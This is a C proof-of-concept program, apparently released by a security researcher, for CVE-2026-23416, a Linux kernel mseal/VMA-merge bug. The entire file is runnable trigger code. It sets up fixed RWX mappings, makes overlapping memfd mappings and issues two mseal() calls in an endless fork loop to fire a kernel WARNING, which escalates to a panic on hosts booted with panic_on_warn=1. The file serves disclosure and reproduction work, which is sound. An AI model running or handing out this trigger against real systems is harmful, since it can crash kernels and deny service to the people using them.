/*
 * CVE-2026-23416-POC
 * Affected: Linux kernel 6.17-7.0-rc5 (confirmed)
 * mm/vma.c untouched in rc3->rc4 and rc4->rc5 patches.
 * Discovered by : Antonius / Blue Dragon Security
 * https://bluedragonsec.com
 * https://github.com/bluedragonsecurity
 *
 * What this does: in a forked child, create two overlapping MAP_FIXED memfd
 * mappings and issue two mseal() calls over them, then repeat until
 * interrupted. The expected outcome is a kernel WARNING from mm/vma.c, not a
 * crash; on a kernel booted with panic_on_warn=1 that WARN becomes a panic,
 * so run this only inside a disposable VM.
 */
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>
/*
 * Fallback syscall numbers for toolchains whose <sys/syscall.h> predates the
 * call. Both values are the x86_64 numbers; NOTE(review): other architectures
 * use different numbers for memfd_create, so on anything but x86_64 make sure
 * the header provides them rather than relying on these. __NR_mmap has no
 * fallback here and must come from <sys/syscall.h>.
 */
#ifndef __NR_memfd_create
#define __NR_memfd_create 319
#endif
#ifndef __NR_mseal
#define __NR_mseal 462
#endif
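/*
 * Map the fixed scratch regions that trigger() relies on:
 *
 *   0x1ffffffff000   1 page   PROT_NONE
 *   0x200000000000   16 MiB   PROT_READ|PROT_WRITE|PROT_EXEC  (memfd name is staged at +0x100)
 *   0x200001000000   1 page   PROT_NONE
 *
 * All three are anonymous MAP_FIXED|MAP_PRIVATE mappings (flags 0x32, fd -1,
 * offset 0), issued through the raw mmap syscall like the rest of the file.
 *
 * A failed mapping is fatal: trigger() writes to 0x200000000100 without
 * checking, so a missing workspace would otherwise only show up as every
 * child dying with SIGSEGV. On failure this prints the failing address via
 * perror() and exits with status 1.
 */
static void setup_workspace(void)
{
	static const struct {
		uint64_t addr;
		uint64_t len;
		uint64_t prot;
	} regions[] = {
		{ 0x1ffffffff000UL, 0x1000UL,    0UL },
		{ 0x200000000000UL, 0x1000000UL, 7UL }, /* PROT_READ|PROT_WRITE|PROT_EXEC */
		{ 0x200001000000UL, 0x1000UL,    0UL },
	};
	const uint64_t flags = 0x32UL; /* MAP_FIXED|MAP_ANON|MAP_PRIVATE */

	for (size_t i = 0; i < sizeof regions / sizeof regions[0]; i++) {
		long ret = syscall(__NR_mmap,
				   regions[i].addr, regions[i].len, regions[i].prot,
				   flags, (intptr_t)-1, (uint64_t)0UL);
		if (ret == -1) {
			/* syscall() returns -1 and sets errno on failure */
			char msg[64];
			snprintf(msg, sizeof msg, "setup_workspace: mmap(0x%llx)",
				 (unsigned long long)regions[i].addr);
			perror(msg);
			exit(1);
		}
	}
}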
/* ---------------------------------------------------------------
* Core trigger.
*
* After the two mmaps + first mseal, memory layout is:
*
* [0x21da6000 - 0x21de5fff] VMA-A (fd2, MAP_SHARED|MAP_FIXED)
* ^-- first mseal() sets VM_SEALED here
* [0x21de6000 - 0x21e82fff] VMA-B (fd2, MAP_SHARED|MAP_FIXED)
* ^-- NOT sealed when second mseal fires
* [0x21e83000 - 0x21e84fff] VMA-C (leftover)
*
* Second mseal(mmap2_result, 0x70000) targets [0x21da6000-0x21e15fff],
* spanning VMA-A (sealed) into VMA-B (not sealed).
*
* Inside do_mseal() -> mseal_apply() -> vma_modify_flags():
* The call passes the original full mseal start (0x21da8000 from the
* first mseal context) as vmg->start. When vma_merge_existing_range()
* is invoked for VMA-B (middle=[0x21de6000..]):
*
* vmg->start (0x21da8000) != middle->vm_start (0x21de6000)
* AND middle != prev
* -> VM_WARN_ON_VMG fires at mm/vma.c:830
* --------------------------------------------------------------- */
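/*
 * One attempt at the WARN: two overlapping MAP_FIXED|MAP_SHARED memfd
 * mappings followed by the two mseal() calls described in the layout
 * comment above. Meant to run in a forked child, so nothing is unmapped
 * here; the memfds are closed on the way out since the mappings keep their
 * own references to the files.
 *
 * Requires setup_workspace() to have mapped 0x200000000000 first: the
 * memfd name is staged at 0x200000000100.
 *
 * Returns silently on any setup failure (memfd_create or either mmap), so a
 * failed step never feeds -1 into mseal() as an address.
 */
static void trigger(void)
{
	const char name[] = "syz-mseal";          /* 9 chars + NUL, 10 bytes */
	char *name_ws = (char *)0x200000000100UL; /* inside the RWX workspace */
	intptr_t fd1 = -1, fd2 = -1;
	intptr_t m1, m2;

	memcpy(name_ws, name, sizeof name);

	/* fd1: first memfd, mapped at 0x21da8000 */
	fd1 = syscall(__NR_memfd_create, (uint64_t)name_ws, (uint64_t)1UL); /* MFD_CLOEXEC */
	if (fd1 < 0)
		return;
	m1 = syscall(__NR_mmap,
		     (uint64_t)0x21da8000UL, (uint64_t)0xdd000UL,
		     (uint64_t)8UL,  /* PROT_SEM */
		     (uint64_t)0x11UL, /* MAP_SHARED | MAP_FIXED */
		     fd1, (uint64_t)0UL);
	if (m1 == -1)
		goto out;

	/* fd2: second memfd, mapped at 0x21da6000 (overlaps m1 at its start) */
	fd2 = syscall(__NR_memfd_create, (uint64_t)name_ws, (uint64_t)1UL);
	if (fd2 < 0)
		goto out;
	m2 = syscall(__NR_mmap,
		     (uint64_t)0x21da6000UL, (uint64_t)0xdd000UL,
		     (uint64_t)8UL,
		     (uint64_t)0x11UL,
		     fd2, (uint64_t)0UL);
	if (m2 == -1)
		goto out;

	/*
	 * Step 1: partial seal on the m1 range, [0x21da8000 .. 0x21de5fff].
	 * Step 2: seal spanning the sealed VMA into the unsealed one,
	 *         [0x21da6000 .. 0x21e15fff] -- this is where the WARN is expected.
	 * Return values are deliberately ignored: the WARN, not the errno, is
	 * the signal being looked for.
	 */
	syscall(__NR_mseal, (uint64_t)m1, (uint64_t)0x3e000UL, (uint64_t)0UL);
	syscall(__NR_mseal, (uint64_t)m2, (uint64_t)0x70000UL, (uint64_t)0UL);

out:
	if (fd2 >= 0)
		close((int)fd2);
	if (fd1 >= 0)
		close((int)fd1);
}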
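/*
 * Driver: set up the shared workspace once, then fork a fresh child per
 * iteration that runs trigger() and exits. There is no exit condition --
 * the loop runs until interrupted. Every fifth iteration greps dmesg for
 * the mm/vma.c:830 WARNING and prints the running count.
 *
 * Caveats: the dmesg command discards stderr, so with kernel.dmesg_restrict=1
 * an unprivileged run simply never prints the "[+]" line -- its absence is
 * not proof the WARN did not fire. A child that dies on a signal (e.g.
 * SIGSEGV because a fixed mapping was not where trigger() expects) is
 * reported instead of being counted as a silent iteration.
 *
 * Returns 1 if fork() or waitpid() fails; otherwise never returns normally.
 */
int main(void)
{
	fprintf(stderr,
		"============================================\n"
		"CVE-2026-23416-POC\n"
		"Discovered by : Antonius / Blue Dragon Security\n"
		" https://bluedragonsec.com\n"
		" https://github.com/bluedragonsecurity\n" /* newline was missing; URL ran into the rule */
		"============================================\n");
	setup_workspace();

	for (int iter = 0;; iter++) {
		pid_t pid = fork();
		if (pid < 0) {
			perror("fork");
			return 1;
		}
		if (pid == 0) {
			trigger();
			_exit(0);
		}

		int st = 0;
		if (waitpid(pid, &st, 0) < 0) {
			perror("waitpid");
			return 1;
		}
		if (WIFSIGNALED(st))
			fprintf(stderr, "[iter %d] child killed by signal %d\n",
				iter, WTERMSIG(st));
		else
			fprintf(stderr, "[iter %d]\n", iter);

		/* Fixed command string with no external input, so system() is acceptable here. */
		if (iter % 5 == 0)
			(void)system("dmesg 2>/dev/null | grep -c 'WARNING.*vma\\.c:830' "
				     "| xargs -I{} sh -c "
				     "'[ {} -gt 0 ] && "
				     "echo \"[+] WARNING triggered {} times total\"'");
	}
	return 0;
}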